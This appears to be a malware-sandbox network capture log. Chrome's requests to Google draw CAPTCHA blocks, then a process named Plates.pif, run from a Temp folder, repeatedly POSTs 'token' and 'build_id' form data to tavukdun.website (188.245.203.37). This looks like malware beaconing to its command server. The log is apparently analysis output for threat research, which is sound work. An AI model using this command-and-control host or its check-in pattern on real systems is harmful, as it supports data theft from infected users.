2024-11-01 19:53:13 UTC	718	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjvqc4BCOSvzgEIw7bOAQi9uc4BCO28zgEIu73OAQjWvc4BCMy/zgEYwcvMARi9rs4BGJ2xzgE= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:53:13 UTC	845	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJblGKnjlLkGIjA4JKXQrmZ41WigJLz9SdzUwH9z-Soh3S6otxgqs3sYzUOFvKSGNY7x3vw11prSaikyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIqeOUuQYQ-b7sxwESBL9gluU Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Date: Fri, 01 Nov 2024 19:53:13 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-01 19:53:13 UTC	410	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh
2024-11-01 19:53:13 UTC	48	IN	Data Raw: 54 6b 56 55 58 30 31 46 55 31 4e 42 52 30 56 61 41 55 4d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: TkVUX01FU1NBR0VaAUM">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49781	142.251.40.132	443	4316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:13 UTC	553	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:53:13 UTC	763	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGKnjlLkGIjDB6F_TrQLAFE94iLL1B0qdDbD51oL79FFvSN9QFQfLnCWSC8OP7uiCV5bxKOdNrPsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIqeOUuQYQ6tGcggISBL9gluU Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Date: Fri, 01 Nov 2024 19:53:13 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-01 19:53:13 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49780	142.251.40.132	443	4316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:13 UTC	909	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJblGKnjlLkGIjA4JKXQrmZ41WigJLz9SdzUwH9z-Soh3S6otxgqs3sYzUOFvKSGNY7x3vw11prSaikyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjvqc4BCOSvzgEIw7bOAQi9uc4BCO28zgEIu73OAQjWvc4BCMy/zgEYwcvMARi9rs4BGJ2xzgE= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:53:13 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 01 Nov 2024 19:53:13 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3207 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-01 19:53:13 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-11-01 19:53:13 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 6f 75 6d 31 6c 49 55 5f 58 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="oum1lIU_X
2024-11-01 19:53:13 UTC	1053	IN	Data Raw: 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 Data Ascii: 0px; margin:0 0 15px 0; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49782	142.251.40.132	443	4316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:14 UTC	727	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGKnjlLkGIjDB6F_TrQLAFE94iLL1B0qdDbD51oL79FFvSN9QFQfLnCWSC8OP7uiCV5bxKOdNrPsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:53:14 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 01 Nov 2024 19:53:14 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3135 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-01 19:53:14 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-11-01 19:53:14 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 70 35 70 71 76 45 79 62 42 63 30 4b 7a 6f 4e 4d 64 62 2d 51 36 33 33 31 51 61 6e 68 77 69 4c 6c 77 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="p5pqvEybBc0KzoNMdb-Q6331QanhwiLlw
2024-11-01 19:53:14 UTC	981	IN	Data Raw: 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 Data Ascii: s page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49788	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:18 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 1065 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:18 UTC	1065	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 36 31 38 61 61 32 64 37 62 63 36 64 61 61 35 30 33 33 66 39 31 39 32 39 35 32 37 32 38 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"34618aa2d7bc6daa5033f9192952728c------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------AFHDAKJKFCFBGCBGDHCBCont
2024-11-01 19:53:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:19 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49789	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:24 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 1237 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:24 UTC	1237	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 36 31 38 61 61 32 64 37 62 63 36 64 61 61 35 30 33 33 66 39 31 39 32 39 35 32 37 32 38 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="token"34618aa2d7bc6daa5033f9192952728c------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------IJJJEBFHDBGIECBFCBKJCont
2024-11-01 19:53:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:25 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	49790	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:25 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAKFCGCGIEGDGCAAKKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 1965 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:25 UTC	1965	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 4b 46 43 47 43 47 49 45 47 44 47 43 41 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 36 31 38 61 61 32 64 37 62 63 36 64 61 61 35 30 33 33 66 39 31 39 32 39 35 32 37 32 38 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 4b 46 43 47 43 47 49 45 47 44 47 43 41 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 4b 46 43 47 43 47 49 45 47 44 47 43 41 41 4b 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------FCAKFCGCGIEGDGCAAKKJContent-Disposition: form-data; name="token"34618aa2d7bc6daa5033f9192952728c------FCAKFCGCGIEGDGCAAKKJContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------FCAKFCGCGIEGDGCAAKKJCont
2024-11-01 19:53:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:26 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	49791	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:26 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:26 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 36 31 38 61 61 32 64 37 62 63 36 64 61 61 35 30 33 33 66 39 31 39 32 39 35 32 37 32 38 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="token"34618aa2d7bc6daa5033f9192952728c------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------AKJKFBAFIDAEBFHJKJEBCont
